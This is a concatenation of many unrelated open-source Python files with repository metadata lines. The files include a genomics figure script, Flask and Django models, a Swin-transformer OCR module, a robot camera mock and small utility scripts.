'h3k27me3 strength', 'h3k4me1 strength', 'Enhancer type', 'eQTL type', 'Super enhancer type', 'Instance count'], rotation=45, horizontalalignment='right') plt.tight_layout() if loopType == 'TAD': plt.savefig('output/figures/figure3.svg') else: plt.savefig('output/figures/figure4C.svg') def computeFeatureSignificances(self, importances, instances, top): """ Compute the significance of the total occurrence of features in the instances within the provided top X instances with highest feature importance compared to X random instances. Parameters: - importances: allImportances output from self.getFeatureImportances() - instances: allInstances output from self.getFeatureImportances() - top: integer value of top X instances with highest importance to select. Return: - pAdjusted: bonferroni corrected p-values of each feature in the true instances compared to the random instances. - featureZScores: z-scores used to compute the p-values. """ #rank the importances by score indices = np.argsort(importances)[::-1] #then get the top instances topInstances = instances[indices[0:top]] #compute the percentages in these top X instances avgInstances = np.sum(topInstances, axis=0) totalInstances = avgInstances / topInstances.shape[0] #then compare to 100 random instances to see if it is significant. #per feature, have a distribution nullDistributions = dict() random.seed(785) for i in range(0,top): if i == 0: for featureInd in range(0, len(totalInstances)): nullDistributions[featureInd] = [] #sample as much random instances as in our filtered instances randomIndices = random.sample(range(0,instances.shape[0]), topInstances.shape[0]) randomTopInstances = instances[randomIndices] #compute the percentages in these top X instances avgRandomInstances = np.sum(randomTopInstances, axis=0) totalRandomInstances = avgRandomInstances / randomTopInstances.shape[0] for featureInd in range(0, len(totalRandomInstances)): nullDistributions[featureInd].append(totalRandomInstances[featureInd]) from math import sqrt #for each feature, compute a z-score featurePValues = [] featureZScores = [] for featureInd in range(0, len(nullDistributions)): if np.std(nullDistributions[featureInd]) == 0: z = 0 pValue = 1 featureZScores.append(z) featurePValues.append(pValue) continue z = (totalInstances[featureInd] - np.mean(nullDistributions[featureInd])) / float(np.std(nullDistributions[featureInd])) pValue = stats.norm.sf(abs(z))*2 featureZScores.append(z) featurePValues.append(pValue) #do MTC on the p-values reject, pAdjusted, _, _ = multipletests(featurePValues, method='bonferroni') return pAdjusted, featureZScores def getFeatureImportances(self, svTypes, cancerType): """ For the given cancer type, compute the random forest feature importances for each model of each SV type. Obtain the full similarity matrix (e.g. not subsampled) and train the RF classifier. Merge the importances of each SV type with the rest, and disregard SV type information as the importances point to similar instances for SV types. Parameters: - svTypes: list with SV types to get the importances for - cancerType: name of cancer type output folder to get data from Return: - allInstances: numpy array with all instances across SV types concatenated - allImportances: feature importance score of instances in allInstances """ #set the directory to look in for this cancer type outDir = 'output/' + cancerType #gather the top 100 instances across all SV types #also return the instances themselves to get the features allInstances = [] allImportances = [] for svType in svTypes: #define the classifiers to use (from optimization) #would be nicer if these are in 1 file somewhere, since they are also used in another script if svType == 'DEL': clf = RandomForestClassifier(random_state=785, n_estimators= 600, min_samples_split=5, min_samples_leaf=1, max_features='auto', max_depth=80, bootstrap=True) title = 'deletions' elif svType == 'DUP': clf = RandomForestClassifier(random_state=785, n_estimators= 600, min_samples_split=5, min_samples_leaf=1, max_features='auto', max_depth=80, bootstrap=True) title = 'duplications' elif svType == 'INV': clf = RandomForestClassifier(random_state=785, n_estimators= 200, min_samples_split=5, min_samples_leaf=4, max_features='auto', max_depth=10, bootstrap=True) title = 'inversions' elif svType == 'ITX': clf = RandomForestClassifier(random_state=785, n_estimators= 1000, min_samples_split=5, min_samples_leaf=1, max_features='auto', max_depth=80, bootstrap=True) title = 'translocations' else: print('SV type not supported') exit(1) #load the similarity matrix of this SV type dataPath = outDir + '/multipleInstanceLearning/similarityMatrices/' #check for sv types for which we have no SVs if not os.path.isfile(dataPath + '/similarityMatrix_' + svType + '.npy'): continue similarityMatrix = np.load(dataPath + '/similarityMatrix_' + svType + '.npy', encoding='latin1', allow_pickle=True) bagLabels = np.load(dataPath + '/bagLabelsSubsampled_' + svType + '.npy', encoding='latin1', allow_pickle=True) instances = np.load(dataPath + '/instancesSubsampled_' + svType + '.npy', encoding='latin1', allow_pickle=True) bagPairLabels = np.load(dataPath + '/bagPairLabelsSubsampled_' + svType + '.npy', encoding='latin1', allow_pickle=True) bagMap = np.load(dataPath + '/bagMap_' + svType + '.npy', encoding='latin1', allow_pickle=True).item() filteredFeatures = np.loadtxt(dataPath + '/lowVarianceIdx_' + svType + '.txt') #train the classifier on the full dataset clf.fit(similarityMatrix, bagLabels) #get the feature importances importances = list(clf.feature_importances_) allImportances += importances #because low index features are removed, add them back here if necessary #to retain an overview of all used features fixedInstances = [] for instance in instances: finalLength = len(instance) + filteredFeatures.size instanceMal = np.zeros(finalLength) #mal including missing features addedFeatures = 0 for featureInd in range(0, finalLength): if featureInd in filteredFeatures: instanceMal[featureInd] = 0 addedFeatures += 1 else: instanceMal[featureInd] = instance[featureInd-addedFeatures] fixedInstances.append(instanceMal) allInstances += fixedInstances allImportances = np.array(allImportances) allInstances = np.array(allInstances) return allImportances, allInstances #1. Make the figure for all TAD-based runs (Fig 3) cancerTypes = ['HMF_Breast_hmec', 'HMF_Ovary_ov', 'HMF_Lung_luad', 'HMF_Colorectal_coad', 'HMF_UrinaryTract_urinaryTract', 'HMF_Prostate_prostate', 'HMF_Esophagus_esophagus', 'HMF_Skin_skin', 'HMF_Pancreas_pancreas', 'HMF_Uterus_uterus', 'HMF_Kidney_kidney', 'HMF_NervousSystem_nervousSystem'] Figure3().generateHeatmap(cancerTypes, 'TAD') #2. Make the figure for all CTCF-based runs (Fig 4C) cancerTypesCTCF = ['HMF_Breast_CTCF'] Figure3().generateHeatmap(cancerTypesCTCF, 'CTCF')
2.796875
3
Previous_State_On_Repo/StrokeRecoveryOffline/Data/code/combineWordHinEngBan.py
rohun-tripati/pythonRepo
1
12764587
#!/usr/bin/env python import netcdf_helpers from scipy import * from optparse import OptionParser from xml.dom.minidom import parse import sys, time, os # import tamil_extract as TE # import bangla_extract as BE import hindi_extract as HE import english_extract as EE import engword_extract as EWE import hinword_extract as HWE import banword_extract as BWE #command line options parser = OptionParser() (options, args) = parser.parse_args() if (len(args)<1): print "usage: test/train/val" sys.exit(2) function = args [0] if not function in ["test", "train", "val"]: print "usage: test/train/val" sys.exit(2) labels = ["hindi", "english", "bangla"] seqDims = [] seqLengths = [] targetStrings = [] wordTargetStrings = [] seqTags = [] inputs = [] #Here begins the module functional call for each of the respective indic scripts inputhinword = [] HWE.main(function, labels, seqDims, seqLengths, targetStrings, wordTargetStrings, seqTags, inputhinword, True) inputMeans = array([ 43.5716277755 , 72.728701988 , 0.0151754027826 ]) inputStds = array([ 27.3972575236 , 51.9577234449 , 0.122250194 ]) inputhinword = ((array(inputhinword)-inputMeans)/inputStds).tolist() inputs.extend(inputhinword) inputbanword = [] BWE.main(function, labels, seqDims, seqLengths, targetStrings, wordTargetStrings, seqTags, inputbanword, True) inputMeans = array([ 39.3020429273 , 64.3542876398 , 0.0174984915094 ]) inputStds = array([ 24.220588125 , 45.5887552493 , 0.131119389505 ]) inputbanword = ((array(inputbanword)-inputMeans)/inputStds).tolist() inputs.extend(inputbanword) inputengword = [] EWE.main(function, labels, seqDims, seqLengths, targetStrings, wordTargetStrings, seqTags, inputengword, True) inputMeans = array([ 44.2994163835 , 68.7957830052 , 0.01821566173 ]) inputStds = array([ 24.4149708067 , 70.159852713 , 0.133730517825 ]) inputengword = ((array(inputengword)-inputMeans)/inputStds).tolist() inputs.extend(inputengword) # inputenglish = [] # EE.main(function, labels, seqDims, seqLengths, targetStrings, wordTargetStrings, seqTags, inputenglish, True) # inputMeans = array([ 21.5401437051 , 19.095532646 , 0.0197438300531 ]) # inputStds = array([ 15.2712299058 , 14.35175744 , 0.139118694746 ]) # inputenglish = ((array(inputenglish)-inputMeans)/inputStds).tolist() # inputs.extend(inputenglish) # inputhindi = [] # HE.main(function, labels, seqDims, seqLengths, targetStrings, wordTargetStrings, seqTags, inputhindi, True) # inputMeans = array([ 116.181545791 , 117.589252273 , 0.0311165710348 ]) # inputStds = array([ 95.3247873525 , 86.246804645 , 0.173632744728 ]) # inputhindi = ((array(inputhindi)-inputMeans)/inputStds).tolist() # inputs.extend(inputhindi) # inputbangla = [] # BE.main(function, labels, seqDims, seqLengths, targetStrings, wordTargetStrings, seqTags, inputbangla, True) # inputMeans = array([ 26.1452919339 , 38.2040724491 , 0.0170435369558 ]) # inputStds = array([ 19.3466051312 , 23.8909551492 , 0.129433592254 ]) # inputbangla = ((array(inputbangla)-inputMeans)/inputStds).tolist() # inputs.extend(inputbangla) # inputtamil = [] # TE.main(function, labels, seqDims, seqLengths, targetStrings, wordTargetStrings, seqTags, inputtamil, True) # inputMeans = array([ 57.8497793792 , 78.1069514634 , 0.00850420629953 ]) # inputStds = array([ 32.9270365136 , 59.0435324226 , 0.0918252948525 ]) # inputtamil = ((array(inputtamil)-inputMeans)/inputStds).tolist() # inputs.extend(inputtamil) # print inputs # print len(labels), labels # print labels #create a new .nc file ncFilename = "combine" + function + ".nc" file = netcdf_helpers.NetCDFFile(ncFilename, 'w') #create the dimensions netcdf_helpers.createNcDim(file,'numSeqs',len(seqLengths)) netcdf_helpers.createNcDim(file,'numTimesteps',len(inputs)) netcdf_helpers.createNcDim(file,'inputPattSize',len(inputs[0])) netcdf_helpers.createNcDim(file,'numDims',1) netcdf_helpers.createNcDim(file,'numLabels',len(labels)) #create the variables netcdf_helpers.createNcStrings(file,'seqTags',seqTags,('numSeqs','maxSeqTagLength'),'sequence tags') netcdf_helpers.createNcStrings(file,'labels',labels,('numLabels','maxLabelLength'),'labels') netcdf_helpers.createNcStrings(file,'targetStrings',targetStrings,('numSeqs','maxTargStringLength'),'target strings') netcdf_helpers.createNcStrings(file,'wordTargetStrings',wordTargetStrings,('numSeqs','maxWordTargStringLength'),'word target strings') netcdf_helpers.createNcVar(file,'seqLengths',seqLengths,'i',('numSeqs',),'sequence lengths') netcdf_helpers.createNcVar(file,'seqDims',seqDims,'i',('numSeqs','numDims'),'sequence dimensions') netcdf_helpers.createNcVar(file,'inputs',inputs,'f',('numTimesteps','inputPattSize'),'input patterns') #write the data to disk print "closing file", ncFilename file.close()
1.695313
2
452_Minimum-Number-of-Arrows-to-Burst-Balloons.py
Coalin/Daily-LeetCode-Exercise
3
12764715
<reponame>Coalin/Daily-LeetCode-Exercise # Attempt I: 贪心的思路,方法错。维护一个静态dict不能保证每次remove后余下的序列仍保持有序。 # class Solution: # def findMinArrowShots(self, points): # """ # :type points: List[List[int]] # :rtype: int # """ # left = 10000 # right = -10000 # for i in range(len(points)): # left = min(left, points[i][0]) # right = max(right, points[i][1]) # poi_dic = dict() # poi_dic_len = dict() # count = 0 # for j in range(len(points)): # for x in range(points[j][0], points[j][1]+1): # if x in poi_dic: # poi_dic[x].append(points[j]) # else: # poi_dic[x] = [points[j]] # for key in poi_dic: # poi_dic_len[key] = len(poi_dic[key]) # arror = self.sort_by_value(poi_dic_len) # print(arror) # for y in arror: # if not points: # return count # intersect = False # for n in points: # if n in poi_dic[y]: # intersect = True # break # if intersect: # count += 1 # for m in poi_dic[y]: # try: # points.remove(m) # except: # pass # def sort_by_value(self, d): # items=d.items() # backitems=[[v[1], v[0]] for v in items] # backitems = sorted(backitems, reverse=True) # return [backitems[i][1] for i in range(len(backitems))] # Attempt II:AC class Solution: def findMinArrowShots(self, points): """ :type points: List[List[int]] :rtype: int """ if not points: return 0 points = sorted(points, key=lambda Interval: Interval[0]) count = 1 ref = points[0] for i in range(1, len(points)): if points[i][0] > ref[1]: count += 1 ref = points[i] else: if points[i][1] < ref[1]: ref = [points[i][0], points[i][1]] return count
2.546875
3
donut/modules/editor/__init__.py
rlin0/donut
0
12764843
<reponame>rlin0/donut import flask blueprint = flask.Blueprint( 'editor', __name__, template_folder='templates', static_folder='static', static_url_path='/donut/modules/editor/static') import donut.modules.editor.routes
0.984375
1
sysinv/sysinv/sysinv/sysinv/openstack/common/keystone_objects.py
Wind-River/starlingx-config
0
12764971
<gh_stars>0 # # Copyright (c) 2015 Wind River Systems, Inc. # # SPDX-License-Identifier: Apache-2.0 # import datetime import iso8601 from oslo_log import log LOG = log.getLogger(__name__) class Token(object): def __init__(self, token_data, token_id, region_name): self.expired = False self.data = token_data self.token_id = token_id self.region_name = region_name def set_expired(self): self.expired = True def is_expired(self, within_seconds=300): if not self.expired: end = iso8601.parse_date(self.data['token']['expires_at']) now = iso8601.parse_date(datetime.datetime.utcnow().isoformat()) delta = abs(end - now).seconds return delta <= within_seconds return True def get_id(self): """ Get the identifier of the token. """ return self.token_id def _get_service_url(self, service_type, service_name, interface_type): """ Search the catalog of a service for the url based on the interface Returns: url or None on failure """ for catalog in self.data['token']['catalog']: if catalog['type'] == service_type: if catalog['name'] == service_name: if len(catalog['endpoints']) != 0: for endpoint in catalog['endpoints']: if ((endpoint['interface'] == interface_type) and (endpoint['region'] == self.region_name)): return endpoint['url'] return None def get_service_admin_url(self, service_type, service_name): """ Search the catalog of a service for the administrative url Returns: admin url or None on failure """ return self._get_service_url(service_type, service_name, 'admin') def get_service_internal_url(self, service_type, service_name): """ Search the catalog of a service for the administrative url Returns: admin url or None on failure """ return self._get_service_url(service_type, service_name, 'internal') def get_service_public_url(self, service_type, service_name): """ Search the catalog of a service for the administrative url Returns: admin url or None on failure """ return self._get_service_url(service_type, service_name, 'public') def get_service_url(self, service_type, service_name): return self.get_service_admin_url(service_type, service_name)
1.445313
1
functions.py
gjoe344/python-learning
0
12765099
#Input, arguments def add(x,y): z = x + y b = 'I am here' a = 'hello' return z,b,a x = 20 y = 5 # Calling function print(add(x,y)) z = add(x,y) #same thing print(z) print(add(10,5)) #same thing
2.25
2
models.py
YongWookHa/swin-transformer-ocr
43
12765227
import torch import random import pytorch_lightning as pl from x_transformers import * from x_transformers.autoregressive_wrapper import * from timm.models.swin_transformer import SwinTransformer import utils class SwinTransformerOCR(pl.LightningModule): def __init__(self, cfg, tokenizer): super().__init__() self.cfg = cfg self.tokenizer = tokenizer self.encoder = CustomSwinTransformer( img_size=(cfg.height, cfg.width), patch_size=cfg.patch_size, in_chans=cfg.channels, num_classes=0, window_size=cfg.window_size, embed_dim=cfg.encoder_dim, depths=cfg.encoder_depth, num_heads=cfg.encoder_heads ) self.decoder = CustomARWrapper( TransformerWrapper( num_tokens=len(tokenizer), max_seq_len=cfg.max_seq_len, attn_layers=Decoder( dim=cfg.decoder_dim, depth=cfg.decoder_depth, heads=cfg.decoder_heads, **cfg.decoder_cfg )), pad_value=cfg.pad_token ) self.bos_token = cfg.bos_token self.eos_token = cfg.eos_token self.max_seq_len = cfg.max_seq_len self.temperature = cfg.temperature def configure_optimizers(self): optimizer = getattr(torch.optim, self.cfg.optimizer) optimizer = optimizer(self.parameters(), lr=float(self.cfg.lr)) if not self.cfg.scheduler: scheduler = torch.optim.lr_scheduler.LambdaLR(optimizer, lr_lambda=lambda x: 1) scheduler = { 'scheduler': scheduler, 'interval': "epoch", "name": "learning rate" } return [optimizer], [scheduler] elif hasattr(torch.optim.lr_scheduler, self.cfg.scheduler): scheduler = getattr(torch.optim.lr_scheduler, self.cfg.scheduler) elif hasattr(utils, self.cfg.scheduler): scheduler = getattr(utils, self.cfg.scheduler) else: raise ModuleNotFoundError scheduler = { 'scheduler': scheduler(optimizer, **self.cfg.scheduler_param), 'interval': self.cfg.scheduler_interval, 'name': "learning rate" } return [optimizer], [scheduler] def forward(self, x): ''' x: (B, C, W, H) labels: (B, S) # B : batch size # W : image width # H : image height # S : source sequence length # E : hidden size # V : vocab size ''' encoded = self.encoder(x) dec = self.decoder.generate(torch.LongTensor([self.bos_token]*len(x))[:, None].to(x.device), self.max_seq_len, eos_token=self.eos_token, context=encoded, temperature=self.temperature) return dec def training_step(self, batch, batch_num): x, y = batch tgt_seq, tgt_mask = y encoded = self.encoder(x) loss = self.decoder(tgt_seq, mask=tgt_mask, context=encoded) self.log("train_loss", loss) return {'loss': loss} def validation_step(self, batch, batch_num): x, y = batch tgt_seq, tgt_mask = y encoded = self.encoder(x) loss = self.decoder(tgt_seq, mask=tgt_mask, context=encoded) dec = self.decoder.generate((torch.ones(x.size(0),1)*self.bos_token).long().to(x.device), self.max_seq_len, eos_token=self.eos_token, context=encoded, temperature=self.temperature) gt = self.tokenizer.decode(tgt_seq) pred = self.tokenizer.decode(dec) assert len(gt) == len(pred) acc = sum([1 if gt[i] == pred[i] else 0 for i in range(len(gt))]) / x.size(0) return {'val_loss': loss, 'results' : { 'gt' : gt, 'pred' : pred }, 'acc': acc } def validation_epoch_end(self, outputs): val_loss = sum([x['val_loss'] for x in outputs]) / len(outputs) acc = sum([x['acc'] for x in outputs]) / len(outputs) wrong_cases = [] for output in outputs: for i in range(len(output['results']['gt'])): gt = output['results']['gt'][i] pred = output['results']['pred'][i] if gt != pred: wrong_cases.append("|gt:{}/pred:{}|".format(gt, pred)) wrong_cases = random.sample(wrong_cases, min(len(wrong_cases), self.cfg.batch_size//2)) self.log('val_loss', val_loss) self.log('accuracy', acc) # custom text logging self.logger.log_text("wrong_case", "___".join(wrong_cases), self.global_step) @torch.no_grad() def predict(self, image): dec = self(image) pred = self.tokenizer.decode(dec) return pred class CustomSwinTransformer(SwinTransformer): def __init__(self, img_size=224, *cfg, **kwcfg): super(CustomSwinTransformer, self).__init__(img_size=img_size, *cfg, **kwcfg) self.height, self.width = img_size def forward_features(self, x): x = self.patch_embed(x) x = self.pos_drop(x) x = self.layers(x) x = self.norm(x) # B L C return x class CustomARWrapper(AutoregressiveWrapper): def __init__(self, *cfg, **kwcfg): super(CustomARWrapper, self).__init__(*cfg, **kwcfg) @torch.no_grad() def generate(self, start_tokens, seq_len, eos_token=None, temperature=1., filter_logits_fn=top_k, filter_thres=0.9, **kwcfg): was_training = self.net.training num_dims = len(start_tokens.shape) if num_dims == 1: start_tokens = start_tokens[None, :] b, t = start_tokens.shape self.net.eval() out = start_tokens mask = kwcfg.pop('mask', None) if mask is None: mask = torch.full_like(out, True, dtype=torch.bool, device=out.device) for _ in range(seq_len): x = out[:, -self.max_seq_len:] mask = mask[:, -self.max_seq_len:] logits = self.net(x, mask=mask, **kwcfg)[:, -1, :] if filter_logits_fn in {top_k, top_p}: filtered_logits = filter_logits_fn(logits, thres=filter_thres) probs = F.softmax(filtered_logits / temperature, dim=-1) elif filter_logits_fn is entmax: probs = entmax(logits / temperature, alpha=ENTMAX_ALPHA, dim=-1) sample = torch.multinomial(probs, 1) out = torch.cat((out, sample), dim=-1) mask = F.pad(mask, (0, 1), value=True) if eos_token is not None and (torch.cumsum(out == eos_token, 1)[:, -1] >= 1).all(): break out = out[:, t:] if num_dims == 1: out = out.squeeze(0) self.net.train(was_training) return out
1.773438
2
server/models.py
pastgift/web-app-template-py
0
12765355
# -*- coding: utf-8 -*- import uuid import hashlib from datetime import datetime from flask import current_app, request from flask.ext.login import UserMixin, AnonymousUserMixin from werkzeug.security import generate_password_hash, check_password_hash from itsdangerous import TimedJSONWebSignatureSerializer as Serializer from server.exceptions import ValidationError from . import db, login_manager class User(db.Model): __tablename__ = 'tb_main_users' id = db.Column(db.String(64), primary_key=True) username = db.Column(db.String(64), unique=True, index=True) password_hash = db.Column(db.String(128)) name = db.Column(db.UnicodeText(64)) status = db.Column(db.String(64), default='normal') last_seen = db.Column(db.DateTime()) created_timestamp = db.Column(db.DateTime(), default=db.func.now()) updated_timestamp = db.Column(db.DateTime(), default=db.func.now(), onupdate=db.func.now()) def __init__(self, **kwargs): super(User, self).__init__(**kwargs) @property def is_active(self): return self.status == 'normal' @property def is_authenticated(self): return self.is_active @property def is_anonymous(self): return False def get_id(self): try: return unicode(self.id) except AttributeError: raise NotImplementedError("No `id` attribute - override get_id") @property def password(self): raise AttributeError('Can not get password') @password.setter def password(self, password): self.password_hash = generate_password_hash(password) def verify_password(self, password): return check_password_hash(self.password_hash, password) def is_admin(self): return self.username == current_app.config['ADMIN_USERNAME'] def ping(self): self.last_seen = datetime.utcnow() db.session.add(self) db.session.commit() def can(self, action): if self.is_admin() and action in current_app.config['ADMIN_DEFAULT_ACL_ACTIONS']: return True if UserAcl.query.filter_by(user_id=self.id, action=action).first(): return True return False def can_any(self, *actions): for action in actions: if self.can(action): return True else: return False def can_all(self, *actions): for action in actions: if not self.can(action): return False else: return True @staticmethod def new(**kwargs): kwargs['id'] = uuid.uuid4().hex return User(**kwargs) def generate_auth_token(self, expiration): s = Serializer(current_app.config['SECRET_KEY'], expires_in=expiration) return s.dumps({'id': self.id}).decode('ascii') @staticmethod def verify_auth_token(token): s = Serializer(current_app.config['SECRET_KEY']) try: data = s.loads(token) except: return None return User.query.get(data['id']) def __repr__(self): return '<User %r>' % self.username class AnonymousUser(AnonymousUserMixin): def is_admin(self): return False def can(self, *args, **kwargs): return False can_any = can can_all = can login_manager.anonymous_user = AnonymousUser @login_manager.user_loader def load_user(user_id): return User.query.get(user_id) class UserAcl(db.Model): __tablename__ = 'tb_main_user_acl' id = db.Column(db.String(64), primary_key=True) user_id = db.Column(db.String(64)) action = db.Column(db.String(128)) created_timestamp = db.Column(db.DateTime(), default=db.func.now()) updated_timestamp = db.Column(db.DateTime(), default=db.func.now(), onupdate=db.func.now()) def __init__(self, **kwargs): super(UserAcl, self).__init__(**kwargs) @staticmethod def new(**kwargs): kwargs['id'] = uuid.uuid4().hex return UserAcl(**kwargs) def __repr__(self): return '<UserAcl %r, %r>' % (self.user_id, self.action) class OperationRecord(db.Model): __tablename__ = 'tb_main_operation_records' id = db.Column(db.String(64), primary_key=True) user_id = db.Column(db.String(64)) operation_note = db.Column(db.Text()) created_timestamp = db.Column(db.DateTime(), default=db.func.now()) updated_timestamp = db.Column(db.DateTime(), default=db.func.now(), onupdate=db.func.now()) def __init__(self, **kwargs): super(OperationRecord, self).__init__(**kwargs) @staticmethod def new(**kwargs): kwargs['id'] = uuid.uuid4().hex return OperationRecord(**kwargs) def __repr__(self): return '<OperationRecord %r>' % self.user_id
1.726563
2
books/templatetags/books.py
Nuurek/HomeLibrary
0
12765483
from django.template import Library from django.forms.models import model_to_dict from django.contrib.auth.models import User from books.models import Book from libraries.models import BookCopy, Lending, Reading register = Library() @register.inclusion_tag('books/tags/book_tag.html') def render_book(book: Book): return model_to_dict(book) @register.inclusion_tag('books/tags/google_book_tag.html') def render_google_book(book: dict): return book @register.inclusion_tag('books/tags/book_copy_tag.html') def render_book_copy(copy: BookCopy, user: User, **kwargs): context = book_copy_to_dict(copy) clean = kwargs.get('clean', False) context['clean'] = clean if clean: context['only_description'] = True else: context['only_description'] = kwargs.get('only_description', False) library = kwargs.get('library') context['user_library'] = user.userprofile.home_library.pk context['is_owner'] = library == user.userprofile.home_library is_book_owner = copy.library == user.userprofile.home_library context['is_book_owner'] = is_book_owner context['is_read'] = Reading.objects.filter(copy=copy) is_kept_by_user = copy.is_kept_by(user.userprofile) context['is_kept_by_user'] = is_kept_by_user context['is_read'] = Reading.objects.filter(copy=copy, reader=user.userprofile, is_completed=False).exists() if is_kept_by_user: context['is_read'] = Reading.objects.filter(copy=copy, reader=user.userprofile, is_completed=False).exists() try: lending = copy.lending_set.get(is_completed=False) context['lending'] = lending library = kwargs.get('library') if library == lending.borrower: context['borrowed'] = True context['lender'] = copy.library.owner.user.username if copy.library else None else: context['lent'] = True context['borrower'] = lending.borrower.owner.user.username if lending.borrower else None context['is_return_available'] = is_book_owner or (lending.borrower and user == lending.borrower.owner.user) except Lending.DoesNotExist: context['is_lending_available'] = is_book_owner return context def book_copy_to_dict(copy: BookCopy): book_dict = model_to_dict(copy.book) book_dict.pop('id') copy_dict = model_to_dict(copy) copy_dict.update(book_dict) return copy_dict
1.601563
2
pyreach/mock/color_camera_mock.py
google-research/pyreach
13
12765611
# Copyright 2021 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """Mock PyReach Color Camera.""" from typing import Callable, Optional import numpy as np # type: ignore from pyreach import calibration as cal from pyreach import color_camera from pyreach import core from pyreach.mock import calibration_mock as cal_mock class ColorFrameMock(color_camera.ColorFrame): """A single color camera frame taken at a specific time. Attributes: time: The time in seconds of the frame since 1970. sequence: The sequence number of the color frame. device_type: The JSON device type string. device_name: The JSON device name string. color_image: A color image as a (DX,DY,3) array of uint8's. calibration: The calibration when the image is captured. """ def __init__(self, time: float, sequence: int, device_type: str, device_name: str, color_image: np.ndarray, calibration: Optional[cal.Calibration]) -> None: """Initialize a MockColorFrame.""" self._time: float = time self._sequence = sequence self._device_type: str = device_type self._device_name: str = device_name self._color_image: np.ndarray = color_image self._calibration: Optional[cal.Calibration] = calibration @property def time(self) -> float: """Return timestamp of the ColorFrame.""" return self._time @property def sequence(self) -> int: """Sequence number of the ColorFrame.""" return self._sequence @property def device_type(self) -> str: """Return the Reach device type.""" return self._device_type @property def device_name(self) -> str: """Return the Reach device name.""" return self._device_name @property def color_image(self) -> np.ndarray: """Return the color image as a (DX,DY,3).""" return self._color_image @property def calibration(self) -> Optional[cal.Calibration]: """Return the Calibration for for the ColorFrame.""" return self._calibration def pose(self) -> Optional[core.Pose]: """Return the pose of the camera when the image is taken.""" raise NotImplementedError class ColorCameraMock(color_camera.ColorCamera): """Mock ColorCamera class.""" def __init__(self) -> None: """Init a MockColorCamera.""" pass def add_update_callback( self, callback: Callable[[color_camera.ColorFrame], bool], finished_callback: Optional[Callable[[], None]] = None) -> Callable[[], None]: """Add a callback function to be invoked when a new frame is available. Args: callback: A function to be invoked when a new frame is available. Returns False to continue receiving new images. Returns True to stop further update. finished_callback: Optional callback, called when the callback is stopped or if the camera is closed. Returns: A function that when called stops the callbacks. """ raise NotImplementedError def start_streaming(self, request_period: float = 0.1) -> None: """Start streaming of camera images. Args: request_period: The number of seconds between frames. Defaults to .1 second between frames. """ pass def stop_streaming(self) -> None: """Stop streaming camera images.""" raise NotImplementedError def supports_tagged_request(self) -> bool: """Return True if tagged requests are supported.""" raise NotImplementedError def enable_tagged_request(self) -> None: """Enable tagged requests.""" raise NotImplementedError def disable_tagged_request(self) -> None: """Disable tagged requests.""" raise NotImplementedError def image(self) -> Optional[color_camera.ColorFrame]: """Return the latest image if it exists.""" color_frame_mock: ColorFrameMock = ColorFrameMock( 1.0, 0, "device_type", "device_name", np.zeros((3, 5, 3), dtype=np.uint8), cal_mock.CalibrationMock("device_type", "device_name", "color_camera_link_name")) color_frame: color_camera.ColorFrame = color_frame_mock return color_frame def fetch_image(self, timeout: float = 15.0) -> Optional[color_camera.ColorFrame]: """Fetch a new image or possibly times out. Args: timeout: The optional amount of time to wait for a camera frame. If not specified, 15 seconds is the default timeout. Returns: Returns the color image or None for a timeout. """ raise NotImplementedError def async_fetch_image(self, callback: Optional[Callable[[color_camera.ColorFrame], None]] = None, error_callback: Optional[Callable[[core.PyReachStatus], None]] = None, timeout: float = 30) -> None: """Fetch a new image asynchronously. The callback function will be invoked when new image is available. Args: callback: A callback function that is called when an image arrives. If the camera fails to load an image, the callback is not called. error_callback: Optional callback that is called if there is an error. timeout: Timeout for the fetch, defaults to 30 seconds. """ raise NotImplementedError @property def pose(self) -> Optional[core.Pose]: """Return the latest pose of the camera.""" raise NotImplementedError
1.875
2
hello.py
sandipsahajoy/CMPUT404-Lab3
0
12765739
<gh_stars>0 #!/usr/bin/env python3 import os, json ### Print python env variables as plain text # print("Content-Type: text/plain") # print() # print(os.environ) ### Print python env variables as json # print("Content-Type: application/json") # print() # print(json.dumps(dict(os.environ), indent=2)) ### Print query parameter data in html # print("Content-Type:text/html") # print() # print("<p>QUERY_STRING: {}</p>".format(os.environ['QUERY_STRING'])) ### Print user's browser parameter data in html print("Content-Type:text/html") print() print("<p>HTTP_USER_AGENT: {}</p>".format(os.environ['HTTP_USER_AGENT']))
1.398438
1
Web_Server/webapps/bemoss_applications/migrations/0001_initial.py
ajfar-bem/wisebldg
0
12765867
# -*- coding: utf-8 -*- # Generated by Django 1.10 on 2017-07-17 19:38 from __future__ import unicode_literals import django.contrib.postgres.fields.jsonb from django.db import migrations, models import django.db.models.deletion class Migration(migrations.Migration): initial = True dependencies = [ ('buildinginfos', '0001_initial'), ] operations = [ migrations.CreateModel( name='ApplicationRegistered', fields=[ ('application_id', models.AutoField(primary_key=True, serialize=False)), ('app_name', models.CharField(blank=True, max_length=50, null=True)), ('description', models.CharField(blank=True, max_length=1000, null=True)), ('app_folder', models.CharField(max_length=200)), ('registered_time', models.DateTimeField()), ], options={ 'db_table': 'application_registered', }, ), migrations.CreateModel( name='ApplicationRunning', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('start_time', models.DateTimeField()), ('app_agent_id', models.CharField(max_length=50)), ('status', models.CharField(blank=True, max_length=20, null=True)), ('app_data', django.contrib.postgres.fields.jsonb.JSONField(default={})), ('app_type', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='bemoss_applications.ApplicationRegistered')), ('building', models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to='buildinginfos.BuildingInfo')), ('zone', models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to='buildinginfos.ZoneInfo')), ], options={ 'db_table': 'application_running', }, ), ]
0.84375
1
flora_tools/utilities.py
Atokulus/flora-tools
1
12765995
<filename>flora_tools/utilities.py import random import string import numpy as np def get_random_text(length=None, max_length=254): if length is None: length = np.random.randint(-1, max_length + 1) if length < 0: return None else: text = ''.join(random.choices(string.ascii_letters + string.ascii_uppercase + string.digits, k=(length - 1))) return text def get_edges(wave): wave_min = np.amin(wave) wave_max = np.amax(wave) digital = np.digitize(wave, [(wave_min + wave_max) / 2.0]) diff = np.diff(digital) indices = np.argwhere(diff) return indices
1.84375
2
jobboard/forms.py
